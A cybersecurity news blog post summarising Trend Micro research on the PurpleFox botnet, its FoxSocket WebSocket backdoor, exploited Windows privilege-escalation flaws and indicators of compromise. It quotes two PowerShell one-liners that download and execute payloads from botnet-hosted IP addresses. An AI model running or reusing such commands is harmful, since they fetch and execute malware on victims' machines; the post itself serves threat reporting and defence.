Posted on Leave a comment

PurpleFox Botnet Uses New Techniques To Secure C2 Connections.

According to researchers, the new variant uses WebSockets to implement more secure C2 bidirectional communication and its operators have incorporated new exploits and payloads.TrendMicro researchers have explained about the PurpleFox botnet’s latest evolution. The specialists uncovered a new.NET backdoor is otherwise known as FoxSocket, that is closely linked to the PurpleFox operation.

 Trend Micro is a long script that comprises three privilege escalation components.These target Windows 7 to Windows 10 systems, but are limited to 64-bit systems only.

The flaws that are exploited by the latest PurpleFox  with the following:

  • Windows 7/Windows Server 2008 – CVE-2020-1054, CVE-2019-0808 
  • Windows 8/Windows Server 2012 – CVE-2019-1458 
  • Windows 10/Windows Server 2019 – CVE-2021-1732

The configuration parameters for deploying this backdoor had a low number of subdomains to contact the C&C servers in the early iterations, agreeing with the creation data of the malicious domain advb9fyxlf2v[.]com, compared to the latest one.

purplefox botnet

“After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.” reads the analysis published by TrendMicro. “The goal is to install the MSI package as an admin without any user interaction.

The list of WebSocket commands observed by TrendMicro is extensive, and although there are some discrepancies between different variants, the table below summarizes them

Overview of WebSocket commands

PowerShell

PowerShell commands being executed:

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//117.187.136.141[:]13405/57BC9B7E.Png’);MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png”

These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:

CountryServer count
China345
India34
Brazil29
United States26
Others113

The fetched payload is a long script consisting of three components:

  1. Tater (Hot Potato – privilege escalation)
  2. PowerSploit
  3. Embedded exploit bundle binary (privilege escalation)

Finally they concluded that, PurpleFox’s rootkit tools allow it to carry out its goals in a more stealthy manner. They enable PurpleFox to remain on impacted systems and deliver more payloads to them. We’re still keeping an eye on these new varieties and their payloads. The new.NET WebSocket backdoor (dubbed FoxSocket and detected as Backdoor.MSIL.PURPLEFOX.AA) is being intensively monitored in order to learn more about this threat actor’s aims and goals.

Indicators of compromise:

SHA-256
1dd5124b7ade65c5abe4b4c0e74441a41761207e430c0a563fc05d91aee226e0
51e7c574abc9c323b6ab257305b568cbfa898187309b6be75f94b69116687573
7edb974e451b6cfeb87bb741f2ce8fb2982e233ce37db90c70d57f15164b8ccd
c0fee2c000f9caf6b49c73ebc6c84c9084ab1aec5d360b9b7dea6b3156f52acc
d4626740bd53e9ae2cf524be4fa83fd6ba0f5692d2cb5f50b2af8232b4de2d0e
d4f9a5f8543a91001a859a064b9b0082e633a09e7e23c5a1557bcf5fb59f284c
f58e4985feba1658de9b25502c367d802aea9da87c01ba3ad38d2f861c44298e

---------------------------------------------

Domain
www.advb9fyxlf2v.com
www2.advb9fyxlf2v.com
www3.advb9fyxlf2v.com
www4.advb9fyxlf2v.com
www5.advb9fyxlf2v.com
www6.advb9fyxlf2v.com
www7.advb9fyxlf2v.com
www8.advb9fyxlf2v.com

---------------------------------------------

IP Address
93.95.226.157
93.95.227.183
93.95.228.163
185.112.144.101
185.112.146.72
185.112.146.83
185.112.147.50

–-For more Cyber security news in crisp content . Please follow our site via twitter handle @cyberworkx1, Linkedin handle @linkedin

Leave a Reply